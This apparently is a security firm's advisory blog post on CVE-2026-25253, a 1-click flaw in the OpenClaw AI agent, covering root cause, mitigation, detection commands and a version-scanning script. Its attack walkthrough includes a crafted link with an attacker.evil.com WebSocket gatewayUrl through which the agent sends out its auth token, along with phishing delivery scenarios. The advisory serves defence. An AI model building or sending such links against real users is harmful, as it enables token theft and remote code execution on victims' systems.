InSEKurity of the Week (CW06/2026): OpenClaw AI Agent 1-Click RCE (CVE-2026-25253)

This week in our InSEKurity of the Week series: A critical 1-click Remote Code Execution vulnerability in the popular open-source AI agent OpenClaw that can be exploited through auth token exfiltration.

🚨 Summary

• CVE ID: CVE-2026-25253
• EUVD ID: EUVD-2026-5280
• CVSS 3.1 Score: 8.8 (High)
• CWE: CWE-669 (Incorrect Resource Transfer Between Spheres)
• Affected Software: OpenClaw (aka Clawdbot, Moltbot) <= v2026.1.24-1
• Attack Vector: Network (Unauthenticated Remote Attack)
• Authentication Required: None
• Impact: Remote Code Execution, Authentication Token Exfiltration
• Patch Status: ✅ Available (Version v2026.1.29)
• Published: January 30, 2026
• Exploit Complexity: Very Low (1-Click)

🤖 What is OpenClaw?

OpenClaw (formerly known as Clawdbot and Moltbot) is a popular open-source AI agent that enables users to automate complex tasks and interact with various APIs and services. As an AI assistant with code execution capabilities, OpenClaw has access to sensitive user data and systems.

The software is used by thousands of developers and companies worldwide for:

• Workflow automation
• Cloud service integration
• API testing and development
• DevOps tasks
• Data aggregation and processing

🔍 Technical Analysis

Vulnerability Description

CVE-2026-25253 is an Incorrect Resource Transfer vulnerability that allows attackers to gain complete control over a victim’s system with just a single click on a manipulated link.

The vulnerability is based on a logic flaw in URL parameter processing: OpenClaw accepts a gatewayUrl parameter from the query string and automatically establishes a WebSocket connection to that URL - without user confirmation and without validating the target URL.

Root Cause Analysis

The problem lies in three critical design flaws:

1. Missing URL Validation: The application doesn’t verify if the gatewayUrl belongs to a trusted domain
2. Automatic WebSocket Connection: Connection is established immediately without user interaction or warning
3. Token Transmission: Authentication tokens are automatically transmitted over the WebSocket connection

Attack Vector

A typical 1-click attack proceeds as follows:

# Step 1: Attacker creates a manipulated link
# The link contains an attacker-controlled gatewayUrl

https://openclaw-app.example.com/?gatewayUrl=wss://attacker.evil.com/ws

# Step 2: Victim clicks the link (e.g., in email, chat, social media)
# OpenClaw opens automatically with the manipulated URL

# Step 3: OpenClaw establishes WebSocket connection to attacker
# Without user confirmation or warning

WebSocket Connection: wss://attacker.evil.com/ws
Sending: {"type":"auth","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."}

# Step 4: Attacker receives authentication token
# Token enables full access to OpenClaw instance

# Step 5: Attacker executes arbitrary commands
# With the stolen token, the attacker can:
# - Extract API keys
# - Read/write local files
# - Execute code on the system
# - Access cloud services

Concrete Exploitation Scenarios:

1. Phishing Campaigns: Mass distribution of manipulated links via email
2. Social Engineering: Sharing links in Slack, Discord, GitHub Issues
3. Watering Hole: Placing links on compromised websites
4. Supply Chain: Injecting links into documentation, tutorials
5. Malvertising: Malicious advertising with OpenClaw links

Impact

After successful token exfiltration, the attacker can:

• Steal API Keys: Access to AWS, Azure, GitHub, OpenAI, etc.
• Execute Local Code: RCE on the victim’s system
• Exfiltrate Data: Project files, credentials, secrets
• Establish Persistence: Install backdoors
• Lateral Movement: Penetrate connected systems

⚠️ Impact Assessment

Immediate Impact

• 1-Click RCE: No user interaction required except clicking the link
• Token Exfiltration: Complete access to OpenClaw instance
• No Warning: Victims don’t notice the attack
• Wide Attack Surface: Any link can be manipulated

Affected Environments

Particularly at risk:

• Developers: Using OpenClaw for automation
• DevOps Teams: With access to production systems
• Cloud Administrators: With privileged API keys
• Data Scientists: With access to sensitive datasets
• Enterprises: That have integrated OpenClaw into workflows

Attacker Profiles

The vulnerability is attractive for:

• Phishing Attackers: For mass credential harvesting
• APT Groups: For targeted compromise of developers
• Ransomware Operators: For initial access opportunities
• Supply Chain Attackers: For compromising build pipelines

🛡️ Mitigation Strategies

Immediate Actions (Priority 1) ⚡

1. Update to v2026.1.29 or higher:

   # Check version
   openclaw --version
   
   # Update (npm)
   npm update -g openclaw
   
   # Update (from source)
   git pull origin main
   npm install
   npm run build

2. Rotate all authentication tokens:

   # CRITICAL: After update, change ALL tokens!
   
   # Rotate AWS credentials
   aws iam create-access-key --user-name your-user
   aws iam delete-access-key --access-key-id OLD_KEY_ID
   
   # Rotate GitHub token
   # Via https://github.com/settings/tokens
   
   # Rotate OpenAI API key
   # Via https://platform.openai.com/account/api-keys
   
   # Rotate additional API keys
   # Depending on services used

3. Check logs for compromise:

   # Search OpenClaw logs
   grep -r "gatewayUrl" ~/.openclaw/logs/
   
   # WebSocket connections to unknown hosts
   grep -E "wss?://[^openclaw]" ~/.openclaw/logs/
   
   # Unusual API calls
   grep "auth" ~/.openclaw/logs/ | grep -v "openclaw.io"

4. Activate network monitoring:

   • Monitor WebSocket connections to external hosts
   • Detect unusual data exfiltration
   • Tighten firewall rules for outbound connections

Detection Measures 🔍

Indicators of Compromise (IoCs):

# Suspicious WebSocket connections
lsof -i -n -P | grep -i websocket | grep -v "openclaw.io"

# Search browser history for manipulated links
grep "gatewayUrl=" ~/.config/*/History ~/.mozilla/*/places.sqlite

# Check network traffic for token leaks
tcpdump -i any -A -s 0 'tcp port 443' | grep -i "bearer\|token\|api"

# Check process list for unexpected connections
netstat -antup | grep "openclaw"

SIEM Rules:

• Alert on WebSocket connections to non-whitelisted domains
• Monitor token transmissions in network traffic
• Detect mass link-clicking patterns
• Log URL parameter manipulation

Long-term Security Improvements

1. Least Privilege: Run OpenClaw with minimal permissions
2. Network Segmentation: Operate AI agents in isolated networks
3. Token Scoping: API keys with minimal rights and expiration
4. Security Awareness: Train employees on AI tool phishing
5. Link Validation: Integrate URL scanners in email gateways

🎯 Why is this Critical?

1. 1-Click Exploitation: Extremely low attack threshold
2. AI Agent Security: New attack vectors through AI tools
3. Token Exfiltration: Access to all connected services
4. Wide User Base: Thousands of developers and companies affected
5. Supply Chain Risk: Compromise of build pipelines possible
6. No User Warning: Attack proceeds completely invisibly
7. PoC Available: Increases likelihood of active exploitation

📊 Affected Versions and Detection

Vulnerable Versions

• OpenClaw: All versions <= v2026.1.24-1
• Clawdbot: All versions (old name)
• Moltbot: All versions (old name)
• Safe Version: >= v2026.1.29

Automatic Detection

#!/bin/bash
# Scan script for vulnerable OpenClaw installations

echo "Scanning for vulnerable OpenClaw installations..."

# Check global npm installation
NPM_VERSION=$(npm list -g openclaw 2>/dev/null | grep openclaw@ | sed 's/.*@//;s/ .*//')
if [ -n "$NPM_VERSION" ]; then
    echo "Found global OpenClaw: v$NPM_VERSION"
    if [ "$(printf '%s\n' "2026.1.29" "$NPM_VERSION" | sort -V | head -n1)" != "2026.1.29" ]; then
        echo "⚠️  VULNERABLE: Global OpenClaw v$NPM_VERSION"
    else
        echo "✅ SAFE: Global OpenClaw v$NPM_VERSION"
    fi
fi

# Find local installations
find /home /Users -name "package.json" -type f 2>/dev/null | while read pkg; do
    if grep -q "openclaw" "$pkg"; then
        dir=$(dirname "$pkg")
        version=$(jq -r '.dependencies.openclaw // .devDependencies.openclaw' "$pkg" 2>/dev/null)
        if [ "$version" != "null" ] && [ -n "$version" ]; then
            echo "Found local OpenClaw in $dir: $version"
        fi
    fi
done

🚀 Timeline and Disclosure

• Discovery Date: January 2026
• CVE Assignment: CVE-2026-25253
• Patch Release: January 30, 2026 (v2026.1.29)
• Public Disclosure: January 30, 2026
• PoC Publication: January 31, 2026

🔗 Resources and References

• CVE: CVE-2026-25253
• CWE: CWE-669: Incorrect Resource Transfer Between Spheres
• OpenClaw GitHub: Repository
• Security Advisory: OpenClaw Security Advisory 2026-01

💼 SEKurity Supports You

This vulnerability demonstrates the new security risks emerging from AI agents and automation tools. A single click can lead to complete compromise.

Our Services

• Penetration Testing: Web applications, mobile apps (Android & iOS), SAP systems, Active Directory
• Large-Scale Attacks: Perimeter testing, IT infrastructure testing, Red Team engagements
• Security Awareness: Phishing campaigns, hacking demonstrations

Act now – before attackers do.

---

Contact:

🌐 Website: www.sekurity.de

📧 Inquiries: www.sekurity.de/kontakt

📱 LinkedIn: SEKurity GmbH

---

Your SEKurity Team – Your Trusted Adversaries

Your AI workflow security is our drive.

---

Sources

• CVE-2026-25253: 1-Click RCE in OpenClaw Through Auth Token Exfiltration - SOCRadar
• CVE-2026-25253: OpenClaw 1-Click RCE Vulnerability Guide - Foresiet
• Warning: Critical vulnerability in OpenClaw - Belgium CCB
• CVE-2026-25253 Details - CVEDetails
• Critical OpenClaw AI Vulnerability Exposed - CtrlAltNod